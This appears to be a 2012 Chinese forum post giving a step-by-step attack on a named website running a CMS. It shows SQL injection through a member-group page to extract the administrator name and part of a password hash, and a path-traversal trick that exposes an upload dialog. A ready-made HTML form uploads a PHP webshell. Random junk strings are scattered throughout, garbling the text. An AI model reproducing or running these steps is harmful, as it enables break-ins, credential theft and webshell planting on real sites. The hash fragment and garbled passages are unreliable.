①注入漏洞。( y: V$ l2 x% F/ F+ Q! J
这站 http://www.political-security.com/
) T, @) K: }8 W首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
" h) `5 G4 D/ twww.political-security.com/data/mysql_error_trace.inc 爆后台
- G( V+ Q! U, W% G然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。( |! d/ p+ j E s) [
然后写上语句
' \" w @. u! A# H查看管理员帐号
/ Y# `1 `7 O& g: U+ s0 k/ Xhttp://www.political-security.co ... &membergroup=@`$ I% H/ k- i* {9 D- g: r- C
* `# L$ _% J7 y
admin & Q7 \, d2 g& }( W& k4 i- n# n; Z
8 u- i/ t k. R" w3 P
查看管理员密码( V* ^3 J% | x
http://www.political-security.co ... &membergroup=@`+ Z X+ Q. D; A' r* B$ A G& |
: ]+ X) @6 C) d* I1 l- k' K* m
8d29b1ef9f8c5a5af429
* Q0 G, X4 ~' b1 I/ z0 n/ r0 t5 X X8 t0 q
查看管理员密码7 u% a& [6 W: }' l+ B1 I5 M+ d+ y) N
0 l; t4 ^2 o8 j/ E得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5# }* U* l$ d* v7 T' E
! \ U; I6 t5 X; S
8d2
4 t0 @1 L# a, E" ?$ U9b1ef9f8c5a5af421 j' M5 M) e( e" F) I; g
9
) B) y% u' z. {2 m( R8 M8 H- @- V1 k- X( x+ Y% c
cmd5没解出来 只好测试第二个方法
" k; w) Z1 y' R" T# ~# c) W+ T5 s) N a; M+ ?, F
, b, z0 X: U" h8 {+ {: l
②上传漏洞:
! L7 u R: D" ^: Q2 g
% c/ ?/ d& n. S6 W4 C, V- [# n. ~只要登陆会员中心,然后访问页面链接
7 _8 B3 {1 A6 X$ \+ M0 S“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
2 @1 b( }$ n& F! {
3 M% |; ` P1 @ F: T! [7 P/ \如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”' y; U. |9 s; h2 `
4 y9 h5 H" x+ i& _2 Q1 M% u! F
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm. L- X7 k: X; Z& Z- J+ E
- f" X( G! U1 M0 V c7 j<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>0 a5 y5 D3 W3 S
或者4 q+ k7 C7 l( H
即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对